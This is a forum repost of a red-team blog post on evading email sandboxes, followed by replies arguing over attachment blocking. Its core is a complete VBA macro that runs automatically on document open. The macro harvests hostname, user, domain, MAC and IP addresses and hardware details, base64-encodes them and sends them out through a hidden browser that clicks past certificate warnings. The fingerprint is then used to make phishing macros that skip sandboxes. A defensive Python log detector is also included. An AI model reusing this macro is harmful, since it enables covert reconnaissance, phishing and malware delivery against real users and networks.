Batu69 Posted September 27, 2016

I decided to mix things up a little bit and do a blog post on something a little different than the usual vulnerability research or CTF write-ups. The bulk of our day job is focused on performing long term external assessments on customer networks, so I thought it might be useful to others to do a post on some hurdles we have had to overcome recently in regard to phishing.

In our experience, phishing is probably responsible for somewhere around 80% of initial network access from external sources. Unfortunately this is due to poor user security training and a handful of other debatable reasons. To try and solve the overwhelming problem of click-happy users, IT administrators have begun installing hardware devices that sandbox incoming emails that contain macros to determine if they perform malicious activity. These devices have become quite effective in stopping suspicious emails from even reaching users.

If you talk to anyone that has been working in security for any significant amount of time, they will tell you that offensive and defensive techniques evolve directly as a result of advances in the other. In our scenario, offensive tactics consisted of emailing users with macros. As a result, defensive tools were developed to sandbox these emails to identify malicious activity. The next natural progression is offensive techniques that render sand-boxing useless. Our team had reasonable success bypassing these devices using various tricks employed by modern malware: https://threatpost.com/malware-evades-detection-with-novel-technique/120787/, http://www.securityweek.com/dyre-banking-trojan-counts-processor-cores-detect-sandboxes. Realizing that this problem was only going to become more prevalent, we decided to take the idea behind the above links one step further. We chose to exploit the function of these devices to bypass them.
Given that they are designed to execute all code passed to them in a sandbox, we decided we would target the sand-boxing hardware specifically. We picked an arbitrary email address in the target domain, constructed a blatant phishing email that the target would likely see often, and attached a macro that performed extensive enumeration of any system that ran the macro. The macro then takes the results of this enumeration and posts them back to an attacker controlled server. Using the results from the enumeration script, we are now able to create a macro that will only run on systems that do not match the fingerprint of the data we received from the email sandbox. This test can be repeated as many times as the red teamer feels is necessary to gain confidence in the results. An example enumeration macro is listed below.

```vba
Function MakeModel()
    ' Manufacturer and model string from WMI
    retStr = ""
    strComputer = "."
    strQuery = "SELECT * FROM Win32_ComputerSystem"
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set colItems = objWMIService.ExecQuery(strQuery)
    For Each objItem In colItems
        retStr = objItem.Manufacturer
        retStr = retStr & "|" & objItem.Model
    Next
    MakeModel = retStr
End Function

Function EnvironVars()
    ' Hostname, user, domain and logon server from environment variables
    sHostname = Environ("computername") & "|" & Environ("username") & _
        "|" & Environ("userdomain") & "|" & Environ("LOGONSERVER")
    EnvironVars = sHostname
End Function

Function RecentFiles()
    ' Size of Word's recent-files list
    Set wdApp = ActiveDocument.Application
    RecentFiles = wdApp.RecentFiles.Count
End Function

Function GetCores()
    ' One WMI instance per logical processor, plus the "_Total" instance
    Dim objWMI, cores, strQuery
    strQuery = "select * from Win32_PerfFormattedData_PerfOS_Processor"
    Set objWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
    Set cores = objWMI.ExecQuery(strQuery, , 48)
    Set GetCores = cores
End Function

Function GetNetwork()
    ' MAC and first IP address of every physical, IP-enabled adapter
    retStr = ""
    strComputer = "."
    strQuery = "Select * From Win32_NetworkAdapter Where PhysicalAdapter = True"
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set colItems = objWMIService.ExecQuery(strQuery)
    Set ipItems = objWMIService.ExecQuery("Select * From Win32_NetworkAdapterConfiguration")
    For Each objItem In colItems
        strMacAddress = objItem.MACAddress
        sysName = objItem.SystemName
        For Each ipItem In ipItems
            If ipItem.MACAddress = strMacAddress And ipItem.IPEnabled = "True" Then
                retStr = retStr & strMacAddress & "|" & ipItem.IPAddress(0) & "|"
                Exit For
            End If
        Next
    Next
    GetNetwork = retStr
End Function

Private Function Enc(ByVal strData As String) As Byte()
    ' Base64-encode through MSXML's bin.base64 data type
    Dim arrData() As Byte
    arrData = StrConv(strData, vbFromUnicode)
    Set objXML = CreateObject("MSXml2.DOMDocument")
    Set objDocElem = objXML.createElement("data")
    objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
    objDocElem.nodeTypedValue = arrData
    Enc = objDocElem.Text
    Set objDocElem = Nothing
    Set objXML = Nothing
End Function

Private Function Dec(ByVal strData As String) As Byte()
    ' Base64-decode through MSXML's bin.base64 data type (unused below)
    Set objXML = CreateObject("MSXml2.DOMDocument")
    Set objDocElem = objXML.createElement("data")
    objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
    objDocElem.Text = strData
    Dec = objDocElem.nodeTypedValue
    Set objDocElem = Nothing
    Set objXML = Nothing
End Function

Sub DoStuff(ByVal strData As String)
    ' Append the encoded result to the URL and fetch it with a hidden IE instance
    Dim IE As Object
    Dim strBaseURL As String
    Dim pre As String
    address = "http://127.0.0.1/"
    'strBaseURL = StrConv(Dec(address), 64)
    Set IE = CreateObject("InternetExplorer.Application")
    IE.Visible = False
    IE.navigate address & strData
    On Error GoTo ErrorHandler
    Do While IE.Busy: DoEvents: Loop
    Do While IE.ReadyState <> 4: DoEvents: Loop
    Set doc = IE.Document
    If Not IsNull(doc.getElementById("overridelink")) Then
        ' Click through IE's certificate warning page if one is shown
        Set lnkOverRide = doc.getElementById("overridelink")
        If Not lnkOverRide Is Nothing Then
            lnkOverRide.Click
            Do While IE.Busy: DoEvents: Loop
            Do While IE.ReadyState <> 4: DoEvents: Loop
            Set doc = IE.Document
        End If
    Else
        Do While IE.Busy: DoEvents: Loop
        Do While IE.ReadyState <> 4: DoEvents: Loop
        Set doc = IE.Document
    End If
    Dim testString As String
    testString = IE.Document.body.innerText
    IE.Stop
    IE.Quit
ErrorHandler:
    Exit Sub
End Sub

Sub AutoOpen()
    Dim retStr As String
    Set cores = GetCores
    Length = 0
    For Each i In cores
        Length = Length + 1
    Next
    retStr = Str(Length - 1)    ' drop the "_Total" instance from the count
    retStr = retStr & "|" & RecentFiles
    retStr = retStr & "|" & EnvironVars
    retStr = retStr & "|" & GetNetwork
    retStr = retStr & "|" & MakeModel
    retStr = Enc(retStr)
    DoStuff (retStr)
End Sub
```

We believe this technique to be reasonably effective against most modern email sandboxes. The only mitigation to this technique is if the results could be randomized or if the outgoing connection with the results was blocked. The first mitigation would be quite difficult since the enumeration script can poll any number of identifying pieces of data. The second would also be difficult since the purpose of the sandbox is to let the malware run in order to profile it. For now, our team will save a few more hours creating phishing content and a few more dollars buying phishing domains. The ball is back in your court, defense.

Article source
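The second mitigation the post names, catching the outgoing connection that carries the enumeration results, is something a sandbox operator can check for at the egress proxy. The following Python script is an added example, not code from the article or from this thread. It assumes a constructed proxy log format of "client_ip method url status" and the record layout the macro's AutoOpen and Enc produce (pipe-joined fields, base64-encoded, appended to the URL path); the log lines and host details are constructed for the example.

```python
"""Egress-side detector for the fingerprint beacon described in the post.

Added example, not from the article or the thread. Assumes a constructed
proxy log ("client_ip method url status") and the macro's record layout:
pipe-joined fields, base64-encoded, appended to the URL path.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlsplit

MAC_RE = re.compile(r"^(?:[0-9A-F]{2}:){5}[0-9A-F]{2}$", re.I)
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


@dataclass
class Finding:
    client_ip: str
    url: str
    fields: List[str]


def encode_fingerprint(fields: List[str]) -> str:
    """Constructed stand-in for the macro's Enc(): pipe-join, then base64."""
    return base64.b64encode("|".join(fields).encode("ascii")).decode("ascii")


def decode_payload(path: str) -> Optional[List[str]]:
    """Return pipe-delimited fields if the URL path is a base64 blob of printable text."""
    blob = path[1:] if path.startswith("/") else path
    # MSXML's bin.base64 text wraps lines at 76 chars; the CR/LF may arrive
    # raw or percent-encoded, so strip both forms before validating.
    for junk in ("%0D", "%0A", "%0d", "%0a", "\r", "\n"):
        blob = blob.replace(junk, "")
    if len(blob) < 16 or not B64_RE.match(blob):
        return None
    try:
        text = base64.b64decode(blob, validate=True).decode("ascii")
    except (binascii.Error, ValueError):
        return None
    if not text.isprintable():
        return None
    return text.split("|")


def looks_like_fingerprint(fields: List[str]) -> bool:
    """Heuristic for the macro's record: a MAC or IPv4 plus a UNC-style logon server."""
    if len(fields) < 6:
        return False
    has_addr = any(MAC_RE.match(f) or IPV4_RE.match(f) for f in fields)
    has_logon = any(f.startswith("\\\\") for f in fields)
    return has_addr and has_logon


def scan_log(log_text: str) -> List[Finding]:
    """Flag requests whose path decodes to a host-fingerprint record."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        client_ip, _method, url, _status = parts
        fields = decode_payload(urlsplit(url).path)
        if fields and looks_like_fingerprint(fields):
            findings.append(Finding(client_ip, url, fields))
    return findings


# Constructed sample of what a sandbox host running the macro would emit.
# The leading space on the core count comes from VBA's Str(); the empty
# field comes from GetNetwork's trailing pipe.
CONSTRUCTED_FIELDS = [" 2", "0", "WS-SANDBOX01", "analyst", "LAB", "\\\\LABDC",
                      "00:0C:29:AA:BB:CC", "10.0.0.5", "", "VMware, Inc.",
                      "VMware Virtual Platform"]

# Constructed proxy log: one beacon among ordinary traffic.
SAMPLE_LOG = "\n".join([
    f"10.0.0.5 GET http://127.0.0.1/{encode_fingerprint(CONSTRUCTED_FIELDS)} 200",
    "10.0.0.7 GET http://intranet.example/index.html 200",
    "10.0.0.9 GET http://cdn.example/js/app.min.js?v=abc123 304",
])

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit.client_ip} -> {hit.url}")
        print("  fields:", hit.fields)
```

The heuristic is keyed to the record layout shown in the macro (an address field plus a `\\LOGONSERVER`-style field inside a base64 path), so it is a starting point to adapt to your own proxy's log format rather than a general-purpose rule; in a sandbox the more robust control is the one the post itself concedes, not letting the analysis host reach the outside at all.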
straycat19 Posted September 27, 2016

This author is a couple years behind on his research. We quit sandboxing and went to blocking emails with attachments (the macro is an attachment) in 2013. No email that originates outside of our own email server is allowed if it contains an attachment. All emails are text based with no HTML allowed. All hyperlinks are removed. Email phishing has become a thing of the past if you are truly interested in securing your network and don't mind investing a little time and money in putting together a good security team.
Holmes Posted September 27, 2016

You are lying, stray. You said Friday you and your so-called organization do this:

Quote: "We provide an FTP server for files that need to be sent to us so we can scan them and test them in a sandbox before notifying the recipient that they have a file on the server. Actual detection of files containing malware using this system has been less than one in a million. It appears that most of the script kiddies are too lazy to find and upload files to an FTP server. Of course, other checks are also made before the files can be uploaded, such as is it coming from an authorized IP."

That's an excerpt from this post:

Now you say they quit using sandboxing. You're a pathological liar and have many posts proving that. Don't you have better shit to do than waste everybody's time?